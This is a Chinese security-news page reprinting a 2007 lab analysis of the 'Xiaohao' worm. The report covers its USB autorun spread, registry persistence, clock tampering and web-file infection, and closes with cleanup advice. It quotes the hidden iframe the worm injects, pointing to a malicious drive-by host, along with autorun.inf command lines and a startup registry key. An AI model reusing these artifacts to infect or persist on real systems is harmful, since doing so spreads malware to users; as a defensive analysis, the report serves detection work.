当前位置:信息安全资讯首页 >> 预警 >> 数据安全实验室发布的“小浩”蠕虫技术报告

数据安全实验室发布的“小浩”蠕虫技术报告

2007-08-15 18:28:08  作者:  来源:数据安全实验室  浏览次数:185  文字大小:【】【】【

  一、病毒描述:
  今日,DSW Lab Avert小组监测到一个具备较强破坏力的名为小浩的蠕虫病毒开始传播,该病毒类似此前曾肆虐网络的熊猫烧香病毒,破坏性感染系统文件,并在受害者系统上遍历网页/脚本文件,插入带毒的网址。因为病毒的破坏性感染行为,导致被感染文件无法修复,严重被感染系统无法使用,会导致用户无法开机现象。

   感染效果截图:

  二、病毒基本情况:
        病毒名称:Worm.Win32.Xiaohao.a
        病毒别名:小浩
        病毒类型:蠕虫
        危害级别:4
        感染平台:Windows 平台
          编写语言:C/C++

  三、病毒行为:
  1、当病毒体在被感染的系统上激活后,会在磁盘跟目录释放autorun.inf等文件,感染U盘等移动设备:
       %DRIVE%\autorun.inf 文件属性:H
       %DRIVE%\Xiaohao.exe 文件属性:H

   2、同时在跟目录释放一个名为Jilu.txt文件,记录了相关感染文件列表。
     3、拷贝自身到系统目录下,全路径: %SystemRoot%\system32\exloroe.exe
     4、将自动加入到注册表启动项确保自身启动激活:

        键路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components
        键名:{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
        键值:%SystemRoot%\system32\exloroe.exe

      5、将系统时间修改为2005年1月17日,会导致部分杀毒软件和其他正版软件因授权问题无法激活。
      
     6、全盘搜索扩展名为*.jsp、*.php、 *.aspx、 *.asp、 *.html、 *.htm的文件,向其中插入病毒网址。
               <iframe src=http://xiaohao.yona.biz/*.htm width=0 height=0></iframe>
       其中该恶意页面利用多个系统漏洞针对Windows 2000/XP/2003进行有针对性的挂马。

       恶意页面的代码截图:

       7、其它行为:
       修改注册表使系统无法正常浏览隐藏文件,修改注册表劫持正常的EXE运行,使得运行一些文件会先运行蠕虫自身: 
        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWAL
       shell\Auto\command=Xiaohao.exe
       shellexecute=Xiaohao.exe
       open=Xiaohao.exe
  当用户打开感染的文件夹时,资源管理器标题会被修改成:已中毒 X14o-H4o's Virus

  四、解决方案
   1、超级巡警已经紧急升级,请广大用户升级到最新特征库来预防病毒。
   2、对于网页被感染的用户,可以使用超级巡警的垃圾清理功能来批量修复被感染的网页,具体功能垃圾清理→智能扫描→清除指定代码,勾选后填入病毒植入的恶意网页,点击扫描→清除即可。
  3、不要运行来历不明的文件。

责任编辑:gxis_admin


相关文章
 

最新文章

更多

· 愚人节黑客可能发动网络攻击
· Adobe惊现0day漏洞 打开...
· 微软证实最新的关键SQL ...
· 微软公布4种方法暂时屏蔽...
· IE7出现0day挂马漏洞 攻...
· 本周“Flash漏洞攻击器”...
· 警惕时事新闻类邮件标题...
· 瑞星发布2008年度第二个...
· 黑客用Flash缺陷兴风作浪...
· 赛门铁克警告中文版Win2...

推荐文章

更多

· 愚人节黑客可能发动网络攻击
· Adobe惊现0day漏洞 打开...
· 微软证实最新的关键SQL ...
· 微软公布4种方法暂时屏蔽...
· IE7出现0day挂马漏洞 攻...
· 本周“Flash漏洞攻击器”...
· 警惕时事新闻类邮件标题...
· 瑞星发布2008年度第二个...
· 黑客用Flash缺陷兴风作浪...
· 赛门铁克警告中文版Win2...

热点文章

更多

友情链接

更多 >>

广西信息网络安全报警网站 南宁市公安局网络警察支队 广西壮族自治区民政厅 国家计算机病毒应急处理中心 广西金普威科技有限责任公司
蓝盾信息安全技术股份有限公司 珠海捷郎菱网络科技有限公司 中国互联安全网 广西顶佳计算机信息有限公司 全国信息网络安全协会联盟
数谷网
桂ICP备05007911号